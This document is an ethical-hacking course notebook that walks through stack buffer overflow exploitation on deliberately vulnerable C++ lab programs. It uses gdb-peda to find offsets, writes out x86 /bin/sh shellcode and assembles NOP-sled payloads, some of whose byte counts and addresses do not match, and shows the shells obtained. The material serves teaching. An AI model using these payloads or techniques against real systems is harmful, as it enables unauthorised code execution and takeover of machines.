## Stack Overflow - Remote Code Execution

- instead of sending junk and executing the existing code, send your own code and execute it!
- for this technique to succeed, program's stack must be executable (not just read and write)
- let's define some terminologies

### Payload
- a buffer that contains code and data to exploit the vulnerability
- payload typically has the following structure:

```bash
| repeated nop sled | shellcode | repeated controlled return address |
```
- offset determines the length of the payload
- shellcode size is fixed depending on what the code is supposed to do
- usually room to play with the length of nop sled and controlled return address

### nop sled
- `\x90` - no operation instruction in assembly
- if the buffer is large enough, use good number of NOP as a bigger cushion/wider landing zone
- as the stack may shift a bit, it's harder to land exactly where the shellcode is
- NOP let's you slide right to your shellcode that spawns a shell/terminal
- you still need to pad the controlled buffer to make it long enough to overwrite the caller's return address
    
### shellcode
- shellcode is attacker's code that can do anything 
    - such as creating/deleting a log file, adding a new user, change filewall rule, etc.
- binary code that actually exploits the vulnerability
- most common shellcode typically spawns, local or remote, tcp connect, reverse connect shell/terminal
- let's you own the system by giving you access to the terminal
- Shellcodes database - [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/)
  
### repeated return address
- address pointing to some address of repeated nop sled  where it is stored in buffer variable
- this controlled return address should overwrite the caller's return address on stack


### Example program that spawns shell/terminal
- let's look at an example program that spawns shell/terminal on the system by calling system call
- `shellcode/system_shell.cpp` program uses system function defined in `<stdlib.h>` library to exectue `/bin/sh` command

In [1]:
! cat shellcode/system_shell.cpp

#include <cstdlib>

using namespace std;

int main(int argc, char* argv[]) {
    // simply call the system command
    system("/bin/sh");
    return 0;
}

In [2]:
%%bash
input="shellcode/system_shell.cpp"
output=system_shell.exe
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

- run system_shell.exe from terminal
    - Jupyter notebook doesn't give shell/terminal

```
┌──(kali㉿K)-[~/EthicalHacking]
└─$ ./system_shell.exe
$ whoami
kali
$ date
Wed 16 Dec 2020 10:37:24 PM MST
$ exit
```
    
- note that shellcode:
    - typically is NOT bash command string by itself - /bin/sh
    - is executable binary when executed gives shell/terminal
    - typically written in C/assembly and compiled/assembled as a binary
    - if stored in stack as a part of buffer, stack must be Executable!
        - so the buffer can be treated as executable code
        
        
## Remote code execution demos
- make stack executable
- use stack variable to store the remote shellcode
- find the location of the shellcode and execute it

### Use program argument to smuggle shellcode
- if the vulnerable program uses argument to get the data, provide shellcode instead of data!
- let's demonstrate it with `demos/stack_overflow/so_arg.cpp` program

In [4]:
# let's look at the source
# program simply copies and prints the user provided argument
! cat demos/stack_overflow/so_arg.cpp

#include <cstdio>
#include <cstring>
#include <iostream>

using namespace std;

#define BUFSIZE 128

void copydata(char *dst_buf, char *src_buf) {
    // similar to strcpy in cstdio
    size_t i = 0;
    // copy each character from src_buf to des_buffer
    // stop when NUL character is encountered
    while (*(src_buf+i) != 0) {
        *(dst_buf+i) = *(src_buf+i);
        i++;
    }
    *(dst_buf+i) = 0; // end with NUL character
}

void bad(char *data) {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    //strcpy(buffer, data);
    copydata(buffer, data);
    cout << "buffer contains: \n" << buffer << endl;
}

int main(int argc, char *argv[]) {
    bad(argv[1]);
    cout << "Good bye!" << endl;
    return 0;
}

In [5]:
%%bash
# let's compile and execute the program
input="demos/stack_overflow/so_arg.cpp"
output=so_arg.exe
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

### crash the program
- provide a large string and see how the program behaves
- if the program crashes, availability of the program is violated and is the telltale sign that the program is likeley vulnerabile to stackoverflow!

In [6]:
! ./so_arg.exe $(python3 -c 'print("A"*100)')
# note the buffer address!
# How do you know the program has crashed? 
# On terminal you'll see segfault!
# On Jupyter notebook it's not obvious...

buffer is at 0xffffc270
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good bye!


In [7]:
# provide a longer argument and see if the program segfaults
! ./so_arg.exe $(python3 -c 'print("A"*128)')
# also note the buffer address

buffer is at 0xffffc250
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good bye!


In [8]:
# provide a longer argument and see if the program segfaults
! ./so_arg.exe $(python3 -c 'print("A"*140)')
# buffer size is 128; 124 As crashes the program; notice no Good bye! printed
# also note the buffer address

buffer is at 0xffffc240
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


- let's verify it on from the terminal that the program actually crashed

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ ./so_arg.exe $(python3 -c 'print("A"*140)')
buffer is at 0xffffc2d0
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./so_arg.exe $(python3 -c 'print("A"*140)')
```

### Remote code exection steps

1. find the offset using gdb-peda
2. generate shellcode using tools (peda, pwntools) or find the right shellcode at [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/)
3. find the return address of buffer or nop sled
4. create payload and send it to the target program appropriately

### Exploiting using bash and gdb-peda

- find the offset using gdb-peda
- we'll find the offset that overwrites the caller's return address

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ gdb -q so_arg.exe         
Reading symbols from so_arg.exe...
```

- create cyclic pattern (long enough) 200 bytes as an argument and use it to run the program

```bash
gdb-peda$ pattern arg 200
Set 1 arguments to program

gdb-peda$ run

Starting program: /home/kali/EthicalHacking/so_arg.exe 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
buffer is at 0xffffc250
buffer contains: 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef71b0 (<_ZNSoD1Ev>:     push   ebx)
EBX: 0x6c414150 ('PAAl')
ECX: 0x6c0 
EDX: 0x8051bb0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
ESI: 0xf7de6000 --> 0x1e4d6c 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x41514141 ('AAQA')
ESP: 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41416d41 ('AmAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41416d41
[------------------------------------stack-------------------------------------]
0000| 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0004| 0xffffc2e4 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0xffffc2e8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0012| 0xffffc2ec ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0xffffc2f0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0020| 0xffffc2f4 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0xffffc2f8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0028| 0xffffc2fc ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41416d41 in ?? ()
```

```bash

gdb-peda$ patts
Registers contain pattern buffer:
EBX+0 found at offset: 132
EBP+0 found at offset: 136
EIP+0 found at offset: 140 <---- !!!THIS IS THE OFFSET!!!
Registers point to pattern buffer:
[EDX] --> offset 0 - size ~203
[ESP] --> offset 144 - size ~56 
Pattern buffer found at:
0x08051bb0 : offset    0 - size  200 ([heap])
0xf7c000cd : offset 33208 - size    4 (/usr/lib32/libm-2.31.so)
0xffffc250 : offset    0 - size  200 ($sp + -0x90 [-36 dwords])
0xffffc625 : offset    0 - size  200 ($sp + 0x345 [209 dwords])
References to pattern buffer found at:
0xf7de6d24 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d28 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d2c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d30 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d34 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d38 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d3c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xffffbbc4 : 0x08051bb0 ($sp + -0x71c [-455 dwords])
0xffffbbe8 : 0x08051bb0 ($sp + -0x6f8 [-446 dwords])
0xffffbc14 : 0x08051bb0 ($sp + -0x6cc [-435 dwords])
0xffffbc30 : 0x08051bb0 ($sp + -0x6b0 [-428 dwords])
0xffffbc34 : 0x08051bb0 ($sp + -0x6ac [-427 dwords])
0xffffbc44 : 0x08051bb0 ($sp + -0x69c [-423 dwords])
0xffffbc94 : 0x08051bb0 ($sp + -0x64c [-403 dwords])
0xffffc0d8 : 0x08051bb0 ($sp + -0x208 [-130 dwords])
0xffffc124 : 0x08051bb0 ($sp + -0x1bc [-111 dwords])
0xf7e62dcc : 0xffffc250 (/usr/lib32/libstdc++.so.6.0.28)
0xffffbd40 : 0xffffc250 ($sp + -0x5a0 [-360 dwords])
0xf7e650b7 : 0xffffc625 (/usr/lib32/libstdc++.so.6.0.28)
0xffffc3b8 : 0xffffc625 ($sp + 0xd8 [54 dwords])

```

- buffer address is conviniently printed everytime program is executed

```bash

┌──(kali㉿K)-[~/EthicalHacking]
└─$ ./so_arg.exe $(python3 -c 'print("A"*10)')                                                                 139 ⨯
buffer is at 0xffffc360   <--------- buffer address; will this shift as the argument length changes?
buffer contains: 
AAAAAAAAAA
Good bye!
```

### need shellcode

- next we need a **shellcode**
- a bunch of binary shellcode files are already provided in `shellcode` folder

In [4]:
! ls -l ./shellcode/

total 20
-rw-r--r-- 1 kali kali  24 Dec 16  2020 shellcode.bin
-rw-r--r-- 1 kali kali  35 Dec 16  2020 shellcode_root.bin
-rw-r--r-- 1 kali kali 978 Mar 17 23:01 shellcode_writer.py
-rw-r--r-- 1 kali kali 153 Dec 16  2020 system_shell.cpp
-rw-r--r-- 1 kali kali 364 Dec 16  2020 x86-linux-sh.py


### generate shellcode with GDB-PEDA

- PEDA provides several shellcodes to pick from
- the following command generates linux/x86 local shellcode


```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ gdb -q    
gdb-peda$ shellcode generate
Available shellcodes:
    x86/linux exec
    x86/linux bindport
    x86/linux connect
    x86/bsd exec
    x86/bsd bindport
    x86/bsd connect

gdb-peda$ shellcode generate x86/linux exec
# x86/linux/exec: 24 bytes
shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
    "\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

```
- your can write the generated shellcode to a file for easy access
- copy line by line hex values between " " and append it to a binary file
- you can bash echo, or python3
- the followin code demonstrates writing shellcode to a file using echo command

In [3]:
# -n : do not print the trailing newline
# -e : enable intrepretation of blackslash
! echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68" > shellcode_bash.bin
! echo -ne "\x68\x2f\x62\x69\x6e\x89\xe3\x31" >> shellcode_bash.bin
! echo -ne "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" >> shellcode_bash.bin

In [4]:
! wc -c shellcode_bash.bin

24 shellcode_bash.bin


In [5]:
! hexdump -C shellcode_bash.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


- the following Pyton3 script to write the shellcode to a binary file

In [8]:
# Python3 script
with open('shellcode_py3.bin', 'wb') as fout:
    fout.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31")
    fout.write(b"\xc9\x89\xca\x6a\x0b\x58\xcd\x80")

In [9]:
! wc -c shellcode_py3.bin

24 shellcode_py3.bin


In [10]:
! hexdump -C shellcode_py3.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


- the following command shows using Python3 from terminal to write the shellcode to a binary file

In [11]:
# Python3 from terminal
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")' > shellcode1_py3.bin

In [12]:
! wc -c shellcode1_py3.bin

24 shellcode1_py3.bin


In [13]:
! hexdump -C shellcode1_py3.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


### create payload

- recall payload has the following structure
```
| NOP sled | shellcode | controlled return address |
```

- we found out that **144** is the total length of the payload as **140** is the offset
- user shellcode (see above) is **24** bytes long
- total bytes remaining for NOP sled and repeated return address can be calculated as following

In [14]:
print(144-24)

120


- out of **120** bytes, return address size is 4 in 32-bit system
- let's repeat the return address *5 times*
- so the size of repeated return address = **5\*4 = 20**
- that leaves us with **120 - 20 = 100 NOP sled**
- **make sure length of (NOP sled + Shellcode) is a multiple of 4!**
    - so the one of the 4-byte repeated return addresses perfectly aligns at the (EBP+4) location

- so, we'll create the payload file of the following structure

```
| 100 NOP sled | 24 bytes shellcode | 5 controlled return addresses |
```

In [36]:
# let's create NOP sled of 100 bytes long and write it to payload.bin file
! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*100)' > payload.bin

In [37]:
# let's append shellcode_py3.bin to payload.bin file
! cat shellcode_py3.bin >> payload.bin

In [38]:
! wc -c payload.bin

124 payload.bin


- what's the address of buffer?
- make sure we use the same size of junk as the size of the payload
- this should be run directly from terminal as the buffer will shift if the program is run from the notebook

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ ./so_arg.exe $(python3 -c 'print("A"*144, end="")')       <-- make sure to pass 144 bytes !!                                                  
buffer is at 0xffffc2d0 <---- accurate buffer address we need
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./so_arg.exe $(python3 -c 'print("A"*144, end="")')
```

- you can try landing at the base address of buffer or some bytes away from it, just in case!

In [17]:
# it's recommended to pick about 20 bytes away from the base address of the buffer 
# if possible and necessary
! printf "%x" $((0xffffc2d0+20))

ffffc2e4

In [48]:
# but, let's just use the buffer's base address to start with...
# we repeat the return address 5 times
! python -c 'import sys; sys.stdout.buffer.write(b"\xd0\xcd\xff\xff"*5)' >> payload.bin

In [49]:
# out payload is ready; let's check size make sure it's the same as the offset
! wc -c payload.bin

164 payload.bin


In [50]:
# let's see the content using hexdump
! hexdump -C payload.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000060  90 90 90 90 31 c0 50 68  2f 2f 73 68 68 2f 62 69  |....1.Ph//shh/bi|
00000070  6e 89 e3 31 c9 89 ca 6a  0b 58 cd 80 e0 c1 ff ff  |n..1...j.X......|
00000080  e0 c1 ff ff e0 c1 ff ff  e0 c1 ff ff e0 c1 ff ff  |................|
00000090  d0 cd ff ff d0 cd ff ff  d0 cd ff ff d0 cd ff ff  |................|
000000a0  d0 cd ff ff                                       |....|
000000a4


#### finally, run the target program with the payload 

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ ./so_arg.exe $(cat payload.bin)                                                                            
buffer is at 0xffffc2d0
buffer contains: 
����������������������������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
  X��������������������
$ whoami
kali
$ date
Wed Dec 16 23:32:08 MST 2020
$ exit

```

## Use standard input to smuggle the shellcode

- if the program takes data from standard input and the buffer overrun is possible, then shellcode can still be transmitted and the program exploited
- the steps are slightly different from sending shellcode as an argument
- let's work with `so_stdio.cpp` program to demonstrate the steps

In [21]:
! cat ./demos/stack_overflow/so_stdio.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 128

using namespace std;

void give_shell(){
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(stdou

In [22]:
%%bash
input="./demos/stack_overflow/so_stdio.cpp"
output=so_stdio.exe

echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

- since the stack_overflow_stdio.exe program reads the data from standard input, it can be piped to the program

In [23]:
! python -c 'print("Hello World")' | ./so_stdio.exe

buffer is at 0xffffc1e0
Give me some text: Acknowledged: Hello World with length 11
Good bye!


### Crash the program

- quick way to tell if the program has buffer overrun vulnerability, is to send a long string and see how the program reacts
- if the program segfaults, it's a telltail sign that the program has buffer overflow flaw

In [24]:
! python -c 'print("A"*100)' | ./so_stdio.exe

buffer is at 0xffffc1e0
Give me some text: Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA with length 100
Good bye!


- because the size of the buffer is 128 and the data we sent was 100, this was okay as expected

In [25]:
# try longer string
! python -c 'print("A"*200)' | ./so_stdio.exe
# since Good bye! is not printed; system must have crashed!

buffer is at 0xffffc1e0
Give me some text: Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA with length 200


- so 200 is long enough (perhaps too long) to crash the program
- let's find the offset of the caller's return address with respect to the buffer in gdb-peda
- use PEDA's cyclic pattern technique as it's much faster than stepping through GDB

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ gdb -q so_stdio.exe
Reading symbols from so_stdio.exe...
```

- since the program reads the data from standard input, we need to pipe the cyclic pattern from a file

```bash
gdb-peda$ pattern create 200 pattern.txt
Writing pattern of 200 chars to filename "pattern.txt"

gdb-peda$ run < pattern.txt 

Starting program: /home/kali/EthicalHacking/so_stdio.exe < pattern.txt
buffer is at 0xffffc310
Give me some text: Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA with length 200

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef71b0 (<_ZNSoD1Ev>:     push   ebx)
EBX: 0x41416b41 ('AkAA')
ECX: 0x6c0 
EDX: 0x8051bb0 ("Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAA"...)
ESI: 0x6c414150 ('PAAl')
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x41514141 ('AAQA')
ESP: 0xffffc3a0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41416d41 ('AmAA')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41416d41
[------------------------------------stack-------------------------------------]
0000| 0xffffc3a0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0004| 0xffffc3a4 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0xffffc3a8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0012| 0xffffc3ac ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0xffffc3b0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0020| 0xffffc3b4 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0xffffc3b8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0028| 0xffffc3bc ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41416d41 in ?? ()

```

- now let's search for pattern to find the offset

```bash
gdb-peda$ patts

Registers contain pattern buffer:
EBX+0 found at offset: 128
EBP+0 found at offset: 136
ESI+0 found at offset: 132
EIP+0 found at offset: 140 <------ 144 IS OUR OFFSET !!!
Registers point to pattern buffer:
[ESP] --> offset 144 - size ~56    
Pattern buffer found at:
0x08051bbe : offset    0 - size  200 ([heap])
0x08051fc0 : offset    0 - size  200 ([heap])
0xf7c000cd : offset 33208 - size    4 (/usr/lib32/libm-2.31.so)
0xffffc310 : offset    0 - size  200 ($sp + -0x90 [-36 dwords])
References to pattern buffer found at:
0xf7de6584 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6588 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de658c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6590 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6594 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6598 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de659c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7b6497c : 0xffffc310 (/usr/lib32/libm-2.31.so)
0xf7e62d0c : 0xffffc310 (/usr/lib32/libstdc++.so.6.0.28)
0xf7e668dc : 0xffffc310 (/usr/lib32/libstdc++.so.6.0.28)
0xffffbe00 : 0xffffc310 ($sp + -0x5a0 [-360 dwords])

```

- so, the buffer length is **144 bytes** to completely overwrite the caller's return address
- next, we need to find the base address of buffer whose location doesn't change with the size of stadard input data provided to the program 
- the base address of buffer is conveniently printed

- create the payload in the form
```
| NOP sled | shellcode | repeated return address |
```
- we need to do some math to figure out the length of NOP sled and repeated return address we need to make the total payload length to be **144 bytes**
- user shellcode size is fixed, let's copy and see the size

In [28]:
! cp ./shellcode/shellcode.bin .

In [29]:
! wc -c shellcode.bin

24 shellcode.bin


In [42]:
# this leaves us with
print(144-24)

120


- since we've 120 bytes, let's use 10 repeated return address just in case
- with the repeated return address length = `10 * 4 = 40`

In [43]:
# NOP sled length
print(120-40)

80


- so we can use 80 NOP bytes as sled to slide down to our shellcode
- now we have all the numbers we need to create our 144 long payload with shellcode

In [51]:
! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*80)' > stdio_payload.bin

In [52]:
! wc -c stdio_payload.bin

80 stdio_payload.bin


In [53]:
! cat shellcode.bin >> stdio_payload.bin

In [54]:
! wc -c stdio_payload.bin

104 stdio_payload.bin


- we need to get the buffer's address from the terminal, not from the Jupyter Notebook!

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ python -c 'print("A"*10)' | ./so_stdio.exe
buffer is at 0xffffc360 <------ BASE ADDRESS OF BUFFER !!!
Give me some text: Acknowledged: AAAAAAAAAA with length 10
Good bye!

```

In [55]:
! python -c 'import sys; sys.stdout.buffer.write(b"\x60\xc3\xff\xff"*10)' >> stdio_payload.bin

In [56]:
! wc -c stdio_payload.bin

144 stdio_payload.bin


- payload is ready and let's send it to the target program from the terminal
- note the - (hyphen) after cat command is required to make the shell interactive
- we don't get a prompt but an accessible terminal; just write some commands such as `whoami`, `ls`, etc.

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ cat stdio_payload.bin - | ./so_stdio.exe 
buffer is at 0xffffc360
Give me some text: 
Acknowledged: ��������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
                                                                                                                 X`���`���`���`���`���`���`���`���`���`��� with length 144
whoami
kali
date
Wed Dec 16 23:52:28 MST 2020
exit
```